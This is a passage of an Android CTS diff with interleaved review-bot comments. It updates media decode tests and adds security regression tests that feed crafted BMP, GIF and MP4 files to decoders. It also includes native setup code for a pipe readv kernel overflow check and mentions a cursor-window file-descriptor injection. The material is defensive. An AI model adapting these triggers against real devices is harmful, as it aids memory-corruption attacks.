+    }
+
+    @Override
+    public Uri insert(@NonNull Uri uri, @Nullable ContentValues values) {
+        Log.e(TAG, "insert() not implemented");
+        return null;
+    }
+
+    @Override
+    public int update(Uri uri, ContentValues values, String selection,
+            String[] selectionArgs) {
+        Log.e(TAG, "update() not implemented");
+        return 0;
+    }
+
+}
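Review bot: The `fdPos == -1` guard in `InjectingCursorWindow.writeToParcel` cannot fire once the parcel holds any data, because `fdPos` is overwritten with the current position on every loop pass, including passes where the marker does not match. If the marker is never seen, the code goes on to splice the replacement descriptor at the position of the last int read instead of throwing. Recording the position only on a match fixes it: `int pos = tmp.dataPosition(); if (tmp.readInt() == 0x66642a85) { fdPos = pos; break; }`. The tail copy also uses `dest.dataPosition()` as an offset into `tmp`, which only lines up if `dest` was empty on entry; a comment stating that assumption would help. Separately, `evilFd` is adopted but never closed, so if `writeFileDescriptor` duplicates the descriptor (as I believe it does) the adopted one leaks.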
diff --git a/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java b/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
index 9b1dc81..7b74ba7 100644
--- a/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
+++ b/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
@@ -19,22 +19,11 @@
 
 import android.annotation.TargetApi;
 import android.content.Context;
-import android.cts.util.MediaUtils;
 import android.graphics.Bitmap;
-import android.media.MediaFormat;
-import android.support.test.runner.AndroidJUnit4;
 import android.util.Log;
 import android.view.View;
 
-import org.junit.After;
-import org.junit.Before;
-import org.junit.Rule;
-import org.junit.rules.Timeout;
-import org.junit.runner.RunWith;
-import org.junit.Test;
-
 @TargetApi(24)
-@RunWith(AndroidJUnit4.class)
 public class DecodeAccuracyTest extends DecodeAccuracyTestBase {
 
     private static final String TAG = DecodeAccuracyTest.class.getSimpleName();
@@ -43,17 +32,12 @@
     private static final String H264_CROPPED_VIDEO_FILE_NAME = "520x360h264decodertest.mp4";
     private static final int ALLOWED_GREATEST_PIXEL_DIFFERENCE = 90;
     private static final int OFFSET = 10;
-    private static final int PER_TEST_TIMEOUT_S = 30;
 
     private View videoView;
     private VideoViewFactory videoViewFactory;
 
-    @Rule
-    public Timeout globalTimeout = Timeout.seconds(PER_TEST_TIMEOUT_S);
-
-    @After
     @Override
-    public void tearDown() throws Exception {
+    protected void tearDown() throws Exception {
         if (videoView != null) {
             getHelper().cleanUpView(videoView);
         }
@@ -64,42 +48,36 @@
     }
 
     /* <------------- Tests Using H264 -------------> */
-    @Test
     public void testH264GLViewVideoDecode() throws Exception {
         runH264DecodeAccuracyTest(
                 new GLSurfaceViewFactory(),
                 new VideoFormat(H264_VIDEO_FILE_NAME));
     }
 
-    @Test
     public void testH264GLViewLargerHeightVideoDecode() throws Exception {
         runH264DecodeAccuracyTest(
                 new GLSurfaceViewFactory(),
                 getLargerHeightVideoFormat(new VideoFormat(H264_VIDEO_FILE_NAME)));
     }
 
-    @Test
     public void testH264GLViewLargerWidthVideoDecode() throws Exception {
         runH264DecodeAccuracyTest(
                 new GLSurfaceViewFactory(),
                 getLargerWidthVideoFormat(new VideoFormat(H264_VIDEO_FILE_NAME)));
     }
 
-    @Test
     public void testH264SurfaceViewVideoDecode() throws Exception {
         runH264DecodeAccuracyTest(
                 new SurfaceViewFactory(),
                 new VideoFormat(H264_VIDEO_FILE_NAME));
     }
 
-    @Test
     public void testH264SurfaceViewLargerHeightVideoDecode() throws Exception {
         runH264DecodeAccuracyTest(
                 new SurfaceViewFactory(),
                 getLargerHeightVideoFormat(new VideoFormat(H264_VIDEO_FILE_NAME)));
     }
 
-    @Test
     public void testH264SurfaceViewLargerWidthVideoDecode() throws Exception {
         runH264DecodeAccuracyTest(
                 new SurfaceViewFactory(),
@@ -107,42 +85,36 @@
     }
 
     /* <------------- Tests Using VP9 -------------> */
-    @Test
     public void testVP9GLViewVideoDecode() throws Exception {
         runVP9DecodeAccuracyTest(
                 new GLSurfaceViewFactory(),
                 new VideoFormat(VP9_VIDEO_FILE_NAME));
     }
 
-    @Test
     public void testVP9GLViewLargerHeightVideoDecode() throws Exception {
         runVP9DecodeAccuracyTest(
                 new GLSurfaceViewFactory(),
                 getLargerHeightVideoFormat(new VideoFormat(VP9_VIDEO_FILE_NAME)));
     }
 
-    @Test
     public void testVP9GLViewLargerWidthVideoDecode() throws Exception {
         runVP9DecodeAccuracyTest(
                 new GLSurfaceViewFactory(),
                 getLargerWidthVideoFormat(new VideoFormat(VP9_VIDEO_FILE_NAME)));
     }
 
-    @Test
     public void testVP9SurfaceViewVideoDecode() throws Exception {
         runVP9DecodeAccuracyTest(
                 new SurfaceViewFactory(),
                 new VideoFormat(VP9_VIDEO_FILE_NAME));
     }
 
-    @Test
     public void testVP9SurfaceViewLargerHeightVideoDecode() throws Exception {
         runVP9DecodeAccuracyTest(
                 new SurfaceViewFactory(),
                 getLargerHeightVideoFormat(new VideoFormat(VP9_VIDEO_FILE_NAME)));
     }
 
-    @Test
     public void testVP9SurfaceViewLargerWidthVideoDecode() throws Exception {
         runVP9DecodeAccuracyTest(
                 new SurfaceViewFactory(),
@@ -150,14 +122,12 @@
     }
 
     /* <------------- Tests H264 with cropping -------------> */
-    @Test
     public void testH264GLViewCroppedVideoDecode() throws Exception {
         runH264DecodeCroppedTest(
                 new GLSurfaceViewFactory(),
                 new VideoFormat(H264_CROPPED_VIDEO_FILE_NAME));
     }
 
-    @Test
     public void testH264SurfaceViewCroppedVideoDecode() throws Exception {
         runH264DecodeCroppedTest(
                 new SurfaceViewFactory(),
@@ -166,23 +136,17 @@
 
     private void runH264DecodeAccuracyTest(
             VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
-        if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_AVC)) {
-            runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertestgolden);
-        }
+        runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertestgolden);
     }
 
     private void runVP9DecodeAccuracyTest(
             VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
-        if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_VP9)) {
-            runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.vp9decodertestgolden);
-        }
+        runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.vp9decodertestgolden);
     }
 
     private void runH264DecodeCroppedTest(
             VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
-        if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_AVC)) {
-            runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertest520x360golden);
-        }
+        runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertest520x360golden);
     }
 
     private void runDecodeAccuracyTest(
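Review bot: `runH264DecodeAccuracyTest`, `runVP9DecodeAccuracyTest` and `runH264DecodeCroppedTest` now call `runDecodeAccuracyTest` without checking that the device has a decoder for the format. Unless `runDecodeAccuracyTest`, whose body lies outside this hunk, checks for itself, a device without the codec would report a failure rather than a skip. If dropping the guard is intended on this branch, a short comment on each helper, such as `// Decoder availability is not checked here; a missing codec fails the test`, would record that.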
@@ -227,8 +191,7 @@
 
     private void validateResult(
             VideoFormat videoFormat, VideoViewSnapshot videoViewSnapshot, int goldenResId) {
-        final Bitmap result = checkNotNull("The expected bitmap from snapshot is null",
-                getHelper().generateBitmapFromVideoViewSnapshot(videoViewSnapshot));
+        final Bitmap result = getHelper().generateBitmapFromVideoViewSnapshot(videoViewSnapshot);
         final Bitmap golden = getHelper().generateBitmapFromImageResourceId(goldenResId);
         final BitmapCompare.Difference difference = BitmapCompare.computeMinimumDifference(
                 result, golden, videoFormat.getOriginalWidth(), videoFormat.getOriginalHeight());
diff --git a/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java b/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java
index 1ce732d..fae1bb4 100644
--- a/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java
+++ b/tests/tests/media/src/android/media/cts/DecodeAccuracyTestBase.java
@@ -44,8 +44,6 @@
 import android.os.HandlerThread;
 import android.os.Looper;
 import android.os.SystemClock;
-import android.support.test.InstrumentationRegistry;
-import android.support.test.runner.AndroidJUnit4;
 import android.test.ActivityInstrumentationTestCase2;
 import android.util.Log;
 import android.util.Pair;
@@ -75,12 +73,7 @@
 import javax.microedition.khronos.egl.EGLDisplay;
 import javax.microedition.khronos.egl.EGLSurface;
 
-import org.junit.After;
-import org.junit.Before;
-import org.junit.runner.RunWith;
-
 @TargetApi(16)
-@RunWith(AndroidJUnit4.class)
 public class DecodeAccuracyTestBase
     extends ActivityInstrumentationTestCase2<DecodeAccuracyTestActivity> {
 
@@ -93,12 +86,9 @@
         super(DecodeAccuracyTestActivity.class);
     }
 
-    @Before
     @Override
-    public void setUp() throws Exception {
+    protected void setUp() throws Exception {
         super.setUp();
-        injectInstrumentation(InstrumentationRegistry.getInstrumentation());
-        setActivityInitialTouchMode(false);
         mActivity = getActivity();
         getInstrumentation().waitForIdleSync();
         mContext = getInstrumentation().getTargetContext();
@@ -106,9 +96,8 @@
         testHelper = new TestHelper(mContext, mActivity);
     }
 
-    @After
     @Override
-    public void tearDown() throws Exception {
+    protected void tearDown() throws Exception {
         mActivity = null;
         super.tearDown();
     }
@@ -128,11 +117,6 @@
         return reference;
     }
 
-    public static <T> T checkNotNull(String msg, T reference) {
-        assertNotNull(msg, reference);
-        return reference;
-    }
-
     public static class SimplePlayer {
 
         public static final long DECODE_TIMEOUT_MS = TimeUnit.SECONDS.toMillis(1) / 2;
@@ -435,8 +419,6 @@
     /* Utility class for collecting common test case functionality. */
     class TestHelper {
 
-        private final String TAG =  TestHelper.class.getSimpleName();
-
         private final Context context;
         private final Handler handler;
         private final Activity activity;
@@ -491,21 +473,13 @@
         }
 
         public synchronized Bitmap generateBitmapFromVideoViewSnapshot(VideoViewSnapshot snapshot) {
-            final long timeOutMs = TimeUnit.SECONDS.toMillis(10);
-            final long start = SystemClock.elapsedRealtime();
             handler.post(snapshot);
             try {
-                while (!snapshot.isBitmapReady()
-                        && (SystemClock.elapsedRealtime() - start < timeOutMs)) {
+                while (!snapshot.isBitmapReady()) {
                     Thread.sleep(100);
                 }
             } catch (InterruptedException e) {
                 e.printStackTrace();
-                return null;
-            }
-            if (!snapshot.isBitmapReady()) {
-                Log.e(TAG, "Time out in generateBitmapFromVideoViewSnapshot().");
-                return null;
             }
             return snapshot.getBitmap();
         }
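Review bot: The wait in `generateBitmapFromVideoViewSnapshot` is now unbounded: `while (!snapshot.isBitmapReady())` has no deadline, and the per-test `Timeout` rule is removed from `DecodeAccuracyTest` in the same change. If a snapshot never becomes ready, the run hangs instead of failing; this could happen if readiness depends on the pixel copy that `SurfaceViewSnapshot` now abandons after `PIXELCOPY_REQUEST_MAX_ATTEMPTS` tries, which I cannot confirm from the visible lines. The `InterruptedException` branch also swallows the interrupt and falls through to `getBitmap()`; adding `Thread.currentThread().interrupt();` there keeps the interruption visible to the caller. A bounded loop that fails the test with a message on expiry would be the safer shape.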
@@ -1191,7 +1165,8 @@
 class SurfaceViewSnapshot extends VideoViewSnapshot  {
 
     private static final String TAG = SurfaceViewSnapshot.class.getSimpleName();
-    private static final int PIXELCOPY_REQUEST_SLEEP_MS = 100;
+    private static final int PIXELCOPY_REQUEST_SLEEP_MS = 30;
+    private static final int PIXELCOPY_REQUEST_MAX_ATTEMPTS = 20;
     private static final int PIXELCOPY_TIMEOUT_MS = 1000;
 
     private final Thread copyThread;
@@ -1207,13 +1182,15 @@
                 bitmap = Bitmap.createBitmap(width, height, Config.ARGB_8888);
                 try {
                     // Wait for SurfaceView to be available.
-                    while (copyResult != PixelCopy.SUCCESS) {
-                        Thread.sleep(PIXELCOPY_REQUEST_SLEEP_MS);
+                    for (int i = 0; i < PIXELCOPY_REQUEST_MAX_ATTEMPTS; i++) {
                         copyResult = copyHelper.request(surfaceView, bitmap);
+                        if (copyResult == PixelCopy.SUCCESS) {
+                            break;
+                        }
+                        Thread.sleep(PIXELCOPY_REQUEST_SLEEP_MS);
                     }
                 } catch (InterruptedException e) {
-                    Log.e(TAG, "Pixel Copy is stopped/interrupted before it finishes.", e);
-                    bitmap = null;
+                    Log.w(TAG, "Pixel Copy is stopped/interrupted before it finishes.", e);
                 }
                 copyHelper.release();
             }
@@ -1317,10 +1294,10 @@
         try {
             waitForByteBuffer();
         } catch (InterruptedException e) {
-            Log.e(TAG, e.getMessage());
-            bitmap = null;
-            return;
+            Log.w(TAG, e.getMessage());
+            Log.w(TAG, "ByteBuffer may contain incorrect pixels.");
         }
+        // Get ByteBuffer anyway. Let the test fail if ByteBuffer contains incorrect pixels.
         ByteBuffer byteBuffer = glSurfaceViewFactory.getByteBuffer();
         bitmap = Bitmap.createBitmap(width, height, Bitmap.Config.ARGB_8888);
         byteBuffer.rewind();
diff --git a/tests/tests/media/src/android/media/cts/MediaRecorderTest.java b/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
index 32d9eaa..dffb653 100644
--- a/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
+++ b/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
@@ -424,6 +424,17 @@
         return 1;
     }
 
+    public void testRecordAudioFromAudioSourceUnprocessed() throws Exception {
+        if (!hasMicrophone()) {
+            return; // skip
+        }
+        mMediaRecorder.setAudioSource(MediaRecorder.AudioSource.UNPROCESSED);
+        mMediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.DEFAULT);
+        mMediaRecorder.setOutputFile(OUTPUT_PATH);
+        mMediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.DEFAULT);
+        recordMedia(MAX_FILE_SIZE, mOutFile);
+    }
+
     public void testGetAudioSourceMax() throws Exception {
         final int max = MediaRecorder.getAudioSourceMax();
         assertTrue(MediaRecorder.AudioSource.DEFAULT <= max);
diff --git a/tests/tests/os/src/android/os/cts/SecurityPatchTest.java b/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
index f7cbcc4..c5baeed 100644
--- a/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
+++ b/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
@@ -32,7 +32,7 @@
     private static final String SECURITY_PATCH_DATE_ERROR =
             "ro.build.version.security_patch should be \"%d-%02d\" or later. Found \"%s\"";
     private static final int SECURITY_PATCH_YEAR = 2017;
-    private static final int SECURITY_PATCH_MONTH = 03;
+    private static final int SECURITY_PATCH_MONTH = 05;
 
     private boolean mSkipTests = false;
 
diff --git a/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp b/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp
index 25dcc9b..12c3517 100644
--- a/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp
+++ b/tests/tests/security/jni/android_security_cts_NativeCodeTest.cpp
@@ -303,14 +303,18 @@
      * set up to overflow iov[OVERFLOW_BUF] on non-atomic redo in kernel
      * function pipe_iov_copy_to_user
      */
-    bufs[OVERFLOW_BUF] = mmap((void*)(FIXED_ADDR), PAGE_SIZE, PROT_READ | PROT_WRITE,
-            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
+    iovs[OVERFLOW_BUF - 1].iov_len = IOV_LEN*10;
+    iovs[OVERFLOW_BUF].iov_base = bufs[OVERFLOW_BUF];
+    iovs[OVERFLOW_BUF].iov_len = IOV_LEN;
+
+    overflow_addr = mmap((void *) FIXED_ADDR, PAGE_SIZE, PROT_READ | PROT_WRITE,
+            MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+    bufs[OVERFLOW_BUF] = overflow_addr;
     if (bufs[OVERFLOW_BUF] == MAP_FAILED) {
         ALOGE("mmap fixed addr failed:%s", strerror(errno));
         goto __close_pipe;
     }
-    iovs[OVERFLOW_BUF].iov_base = bufs[OVERFLOW_BUF];
-    iovs[OVERFLOW_BUF].iov_len = IOV_LEN;
 
     for (i = 0; i < BUFS; i++) {
         if (i == OVERFLOW_BUF) {
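Review bot: `iovs[OVERFLOW_BUF].iov_base` is now set from `bufs[OVERFLOW_BUF]` before that slot is assigned the `mmap` result, so the iovec keeps whatever the slot held earlier rather than the new mapping. With `MAP_FIXED` dropped, `FIXED_ADDR` is only a hint and `overflow_addr` may differ from it, and the `MAP_FAILED` check now runs after the iovec setup. If the early assignment is intentional for this check, a comment saying so is needed, e.g. `/* iov_base is deliberately taken before the mapping is created */`; otherwise move the two `iovs[OVERFLOW_BUF]` assignments below the `MAP_FAILED` check. The function continues outside the hunk, so later code may reassign these fields.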
diff --git a/tests/tests/security/res/raw/bug_33251605.bmp b/tests/tests/security/res/raw/bug_33251605.bmp
new file mode 100644
index 0000000..0060ff4
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33251605.bmp
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33818508.mp4 b/tests/tests/security/res/raw/bug_33818508.mp4
new file mode 100644
index 0000000..d2f2604
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33818508.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33897722.gif b/tests/tests/security/res/raw/bug_33897722.gif
new file mode 100755
index 0000000..7a563d7
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33897722.gif
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_34778578.bmp b/tests/tests/security/res/raw/bug_34778578.bmp
new file mode 100644
index 0000000..4a08a61
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_34778578.bmp
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_35467107.mp4 b/tests/tests/security/res/raw/bug_35467107.mp4
new file mode 100644
index 0000000..43ccef6
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_35467107.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_35763994.amr b/tests/tests/security/res/raw/bug_35763994.amr
new file mode 100644
index 0000000..b6d3f0e
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_35763994.amr
@@ -0,0 +1 @@
+#!AMR-WB
diff --git a/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4 b/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4
new file mode 100644
index 0000000..6d41ebc
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_2507.mp4 b/tests/tests/security/res/raw/cve_2016_2507.mp4
new file mode 100644
index 0000000..ca248e1
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_2507.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_3755.mp4 b/tests/tests/security/res/raw/cve_2016_3755.mp4
new file mode 100644
index 0000000..014bd06
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_3755.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_3878_b_29493002.mp4 b/tests/tests/security/res/raw/cve_2016_3878_b_29493002.mp4
new file mode 100644
index 0000000..469a1b3
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_3878_b_29493002.mp4
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/BigRleTest.java b/tests/tests/security/src/android/security/cts/BigRleTest.java
new file mode 100644
index 0000000..f3c2302
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/BigRleTest.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.BitmapFactory;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class BigRleTest extends AndroidTestCase {
+    /**
+     * Verifies that the device does not run OOM decoding a particular RLE encoded BMP.
+     *
+     * This image reports that its encoded length is over 4 gigs. Prior to fixing issue 33251605,
+     * we attempted to allocate space for all the encoded data at once, resulting in OOM.
+     */
+    public void test_android_bug_33251605() {
+        InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33251605);
+        Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
+    }
+}
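Review bot: `test_android_bug_33251605` never closes the stream returned by `openRawResource`, and the same applies to `test_android_bug_34778578` in DecodeTest.java and `test_android_bug_33897722` in Movie33897722.java; closing it in a `finally` or a try-with-resources (the method would then need `throws IOException`) releases it. This test and the one in Movie33897722.java also lack the `@SecurityTest` annotation that DecodeTest.java carries, so if that annotation is used to select security tests they may be left out of such runs. The decoded `bitmap` is unused and nothing is asserted; a comment such as `// Passes if decoding returns without exhausting memory; the result is not checked` would make the pass condition explicit.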
diff --git a/tests/tests/security/src/android/security/cts/DecodeTest.java b/tests/tests/security/src/android/security/cts/DecodeTest.java
new file mode 100644
index 0000000..e64e37a
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/DecodeTest.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.BitmapFactory;
+import android.platform.test.annotations.SecurityTest;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class DecodeTest extends AndroidTestCase {
+    /**
+     * Verifies that the device fails to decode a large, corrupt BMP.
+     *
+     * Prior to fixing bug 34778578, decoding this file would crash. Instead, it should fail to
+     * decode.
+     */
+    @SecurityTest
+    public void test_android_bug_34778578() {
+        InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_34778578);
+        Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
+        assertNull(bitmap);
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/Movie33897722.java b/tests/tests/security/src/android/security/cts/Movie33897722.java
new file mode 100644
index 0000000..f6859da
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/Movie33897722.java
@@ -0,0 +1,65 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.graphics.Bitmap;
+import android.graphics.Canvas;
+import android.graphics.Color;
+import android.graphics.Movie;
+import android.graphics.Paint;
+import android.graphics.PorterDuff;
+import android.graphics.PorterDuffXfermode;
+import android.test.AndroidTestCase;
+
+import java.io.InputStream;
+
+import android.security.cts.R;
+
+public class Movie33897722 extends AndroidTestCase {
+    /**
+     * Verifies that decoding a particular GIF file does not read out out of bounds.
+     *
+     * The image has a color map of size 2, but states that pixels should come from values
+     * larger than 2. Ensure that we do not attempt to read colors from beyond the end of the
+     * color map, which would be reading memory that we do not control, and may be uninitialized.
+     */
+    public void test_android_bug_33897722() {
+        InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33897722);
+        Movie movie = Movie.decodeStream(exploitImage);
+        assertNotNull(movie);
+        assertEquals(movie.width(), 600);
+        assertEquals(movie.height(), 752);
+
+        // The image has a 10 x 10 frame on top of a transparent background. Only test the
+        // 10 x 10 frame, since the original bug would never have used uninitialized memory
+        // outside of it.
+        Bitmap bitmap = Bitmap.createBitmap(10, 10, Bitmap.Config.ARGB_8888);
+        Canvas canvas = new Canvas(bitmap);
+
+        // Use Src PorterDuff mode, to see exactly what the Movie creates.
+        Paint paint = new Paint();
+        paint.setXfermode(new PorterDuffXfermode(PorterDuff.Mode.SRC));
+
+        movie.draw(canvas, 0, 0, paint);
+
+        for (int x = 0; x < 10; x++) {
+            for (int y = 0; y < 10; y++) {
+                assertEquals(bitmap.getPixel(x, y), Color.TRANSPARENT);
+            }
+        }
+    }
+}
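Review bot: The `assertEquals` calls pass the actual value first, as in `assertEquals(movie.width(), 600)`, while JUnit's signature is `(expected, actual)`, so a failure message would name the wrong value as expected. Swap them: `assertEquals(600, movie.width());`, `assertEquals(752, movie.height());` and `assertEquals(Color.TRANSPARENT, bitmap.getPixel(x, y));`. In the pixel loop, putting the coordinates in the assertion message would make a failure easier to locate. The javadoc's first line also reads "out out of bounds".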
diff --git a/tests/tests/security/src/android/security/cts/NativeCodeTest.java b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
index 5fa698e..eb162fb 100644
--- a/tests/tests/security/src/android/security/cts/NativeCodeTest.java
+++ b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
@@ -16,6 +16,8 @@
 
 package android.security.cts;
 
+import android.platform.test.annotations.SecurityTest;
+
 import junit.framework.TestCase;
 
 public class NativeCodeTest extends TestCase {
@@ -24,6 +26,7 @@
         System.loadLibrary("ctssecurity_jni");
     }
 
+    @SecurityTest
     public void testVroot() throws Exception {
         assertTrue("Device is vulnerable to CVE-2013-6282. Please apply security patch at "
                    + "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/"
@@ -31,6 +34,7 @@
                    + "8404663f81d212918ff85f493649a7991209fa04", doVrootTest());
     }
 
+    @SecurityTest
     public void testPerfEvent() throws Exception {
         assertFalse("Device is vulnerable to CVE-2013-2094. Please apply security patch "
                     + "at http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/"
@@ -38,10 +42,12 @@
                     doPerfEventTest());
     }
 
+    @SecurityTest
     public void testPerfEvent2() throws Exception {
         assertTrue(doPerfEventTest2());
     }
 
+    @SecurityTest
     public void testFutex() throws Exception {
         assertTrue("Device is vulnerable to CVE-2014-3153, a vulnerability in the futex() system "
                    + "call. Please apply the security patch at "
@@ -50,6 +56,7 @@
                    doFutexTest());
     }
 
+    @SecurityTest
     public void testNvmapIocFromId() throws Exception {
         assertTrue("Device is vulnerable to CVE-2014-5332. "
                    + "NVIDIA has released code fixes to upstream repositories and device vendors. "
@@ -58,6 +65,7 @@
                    doNvmapIocFromIdTest());
     }
 
+    @SecurityTest
     public void testPingPongRoot() throws Exception {
         assertTrue("Device is vulnerable to CVE-2015-3636, a vulnerability in the ping "
                    + "socket implementation. Please apply the security patch at "
@@ -65,6 +73,7 @@
                    doPingPongRootTest());
     }
 
+    @SecurityTest
     public void testPipeReadV() throws Exception {
         assertTrue("Device is vulnerable to CVE-2015-1805 and/or CVE-2016-0774,"
                    + " a vulnerability in the pipe_read() function."
@@ -74,6 +83,7 @@
                    doPipeReadVTest());
     }
 
+    @SecurityTest
     public void testSysVipc() throws Exception {
         assertTrue("Android does not support Sys V IPC, it must "
                    + "be removed from the kernel. In the kernel config: "
@@ -114,6 +124,7 @@
      */
     private static native boolean doVrootTest();
 
+    @SecurityTest
     public void testCVE20141710() throws Exception {
         assertTrue("Device is vulnerable to CVE-2014-1710", doCVE20141710Test());
     }
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 1c5fdb7..c481549 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2015 The Android Open Source Project
+ * Copyright (C) 2016 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -39,12 +39,16 @@
 import android.opengl.GLES11Ext;
 import android.os.Looper;
 import android.os.SystemClock;
+import android.platform.test.annotations.SecurityTest;
 import android.test.InstrumentationTestCase;
 import android.util.Log;
 import android.view.Surface;
+import android.webkit.cts.CtsTestServer;
 
 import java.io.IOException;
+import java.nio.ByteBuffer;
 import java.util.ArrayList;
+import java.util.HashMap;
 import java.util.concurrent.locks.Condition;
 import java.util.concurrent.locks.ReentrantLock;
 
@@ -68,142 +72,229 @@
      before any existing test methods
      ***********************************************************/
 
+    public void testStagefright_bug_35763994() throws Exception {
+        doStagefrightTest(R.raw.bug_35763994);
+    }
+
+    @SecurityTest
     public void testStagefright_bug_33137046() throws Exception {
         doStagefrightTest(R.raw.bug_33137046);
     }
 
+    @SecurityTest
+    public void testStagefright_cve_2016_2507() throws Exception {
+        doStagefrightTest(R.raw.cve_2016_2507);
+    }
+
+    @SecurityTest
     public void testStagefright_bug_31647370() throws Exception {
         doStagefrightTest(R.raw.bug_31647370);
     }
 
+    @SecurityTest
     public void testStagefright_bug_32577290() throws Exception {
         doStagefrightTest(R.raw.bug_32577290);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_1538_1() throws Exception {
         doStagefrightTest(R.raw.cve_2015_1538_1);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_1538_2() throws Exception {
         doStagefrightTest(R.raw.cve_2015_1538_2);
     }
 
+    @SecurityTest
     public void testStagefright_cve_2015_1538_3() throws Exception {
